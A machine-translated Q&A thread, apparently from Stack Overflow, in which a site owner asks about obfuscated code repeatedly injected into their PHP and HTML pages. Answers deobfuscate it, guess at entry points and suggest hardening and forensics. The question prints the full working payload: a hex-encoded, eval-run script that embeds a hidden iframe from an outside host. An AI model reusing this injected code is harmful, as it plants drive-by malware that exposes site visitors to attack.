停止将代码注入页代码

Question

我在堆栈溢出站点上开始了一个主题这里，但是这里引用了这个主题。

我确实得到了一些信息，但认为需要更深入的投入。所以希望的人能帮上忙。

我有一些领域，我使用的网站和测试。大多数是托管在一个著名的域名网站，其他与一个小的。

最近，我注意到我的页面版面已经过时了。在检查时，注意到正在运行一个iFrame (我从来没有放在那里)。

我删除了它并更改了我的文件权限。

这种情况再次发生了几次，然后从iFrame变成了javascript。这是为了看。

<?
#68c8c7#  echo " <script type=\"text/javascript\" language=\"javascript\" >
 asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x72,0x61,0x73,0x73,0x65,0x6c,0x74,0x2d,0x6b,0x61,0x6c,0x6f,0x72,0x61,0x6d,0x61,0x2e,0x6e,0x6c,0x2f,0x72,0x65,0x6c,0x61,0x79,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x79,0x6f,0x6b,0x64,0x6a,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x79,0x6f,0x6b,0x64,0x6a,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x79,0x6f,0x6b,0x64,0x6a,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x79,0x6f,0x6b,0x64,0x6a,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x79,0x6f,0x6b,0x64,0x6a,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=34;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window[\"eval\"];}s=\"\";for(i=0;i-499!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}</script>";
#/68c8c7#
?>

请注意，它是一个PHP脚本。直接在我的代码里。我在HTML中也有同样的东西。

似乎我所有的网站都感染了这种病毒，甚至是那些不在同一主机上的网站。

有人能帮忙吗？

Answer 1

为了向您展示这个脚本所做的，因为人们使用的混淆技术总是很有趣的。

<?
#68c8c7#  echo " <script type=\"text/javascript\" language=\"javascript\" >
asgq=[0x72,0x65,0x6c,0x61,...0x28,0x29,0x3b];
try{document.body|=1} catch(gdsgsdg){


    // Some attempt of obfuscation
    zz=3;
    dbshre=34;

 if(dbshre){ 
      vfvwe=0;

    // Some attempt of obfuscation
      try{} catch(agdsg) {
           vfvwe=1;
      }

      if(!vfvwe){
        // This is the Eval Function
           e=window[\"eval\"];
      }

      s=\"\";
      for(i=0;i-499!=0;i++){
           if(window.document) {
                // Add encoded script (asgg) to variable s.
                  s+=String.fromCharCode(asgq[i]);
           }
      }

// Some attempt of obfuscation
 z=s; 
// 'e' is the eval function which was defined above.
 e(s);
 }
}
</script>";
#/68c8c7#
?>

“asgq”变量有以下代码：

(function () {
    var yokdj = document.createElement('iframe');

    yokdj.src = 'http://*********.nl/relay.php';
    yokdj.style.position = 'absolute';
    yokdj.style.border = '0';
    yokdj.style.height = '1px';
    yokdj.style.width = '1px';
    yokdj.style.left = '1px';
    yokdj.style.top = '1px';

    if (!document.getElementById('yokdj')) {
        document.write('<div id=\'yokdj\'></div>');
        document.getElementById('yokdj').appendChild(yokdj);
    }
})();

我已经取出了网址，因为我不认为这是一个好主意，人们去网站，可能包含恶意软件。

Answer 2

您可以说，像这样的php脚本已经直接注入到您的文件中，这意味着攻击者已经能够修改计算机上的文件(有多种方法可以获得此功能)。在某种程度上，您已经在所有站点上创建了相同的漏洞。

有可能您有一些问题是非常常见的/众所周知的，而且有人的自动化脚本已经发现了这一事实。我想到的一些想法：

• PHP代码注入

一些攻击者已经能够手工用户输入到您的网站的某些部分，以便他们可以运行任何他们想要的php代码。例如，如果您要从一个文件中获取输入并将其插入php (http://php.net/manual/en/function.eval.php)中，那么就可以调用file_put_contents (http://php.net/manual/en/function.file-put-contents.php)并直接修改您的php文件以获得附加代码。

• 外壳访问

一些攻击者可以运行他们想要的任何东西，因为他们以其他方式侵入了您的机器。例如，如果您接受ssh的登录，并且您的根帐户密码是“密码”，那么有人就可以通过使用公共密码字典中的条目登录到您的计算机上来进行访问。

不过，这都是猜测。一些一般性建议(研究如何分别进行这些工作)。

• 将密码更改为机器上的所有登录帐户。
• 确保没有运行的服务不是您自己安装的
• 加强您的PHP配置。类似于Harden php configuration的谷歌搜索将帮助你进行研究。
• 加强您的web服务器配置。确保您的web服务器正在使用仅为您的web服务器创建的用户帐户运行。
• 您可以检查您的代码的问题，但我怀疑您将不知道寻找什么。也许您可以尝试一些类似Tripwire (我以前没有使用过)的东西来等待/监视文件中的更改。一旦检测到更改，就可以知道它们是什么时候发生的(您甚至可以查看更改文件/S上的时间戳)。在那里，您可以在web服务器日志/php日志/syslog/authlog中挖掘以进行取证，以找出您的漏洞所在。

Answer 3

您是否查看过数据库内容，以查看这些脚本是否存储在那里？(转储内容并进行文本搜索)您必须确定攻击者是通过文件系统(通过远程文件包括http://en.wikipedia.org/wiki/File_包裹体_脆弱性 )将其放入页面，还是通过sql将其插入数据库。当你移除它的时候，你把它从哪里移走了？

搜索注入代码中的一些关键字：

谷歌"yokdj“找到http://wepawet.iseclab.org/view.php?hash=e0bad0592a91abe341c3f13f573309df&t=1362926702&type=js

google“fromCharCode(asgq我)”生成受感染网站列表。此外，该搜索还引发了关于以下代码的几个讨论: stackoverflow线程：

https://stackoverflow.com/questions/15232851/javascript-obfuscation-learning-from-the-bad-guys和：

http://www.simplemachines.org/community/index.php?topic=494622.0

听起来这已经影响到了几个php相关的系统。其他报告说，它是在它被删除后马上回来的，这让我觉得是一个机器人把它注入到你网站上的一个表单中。请告诉我们你发现了什么！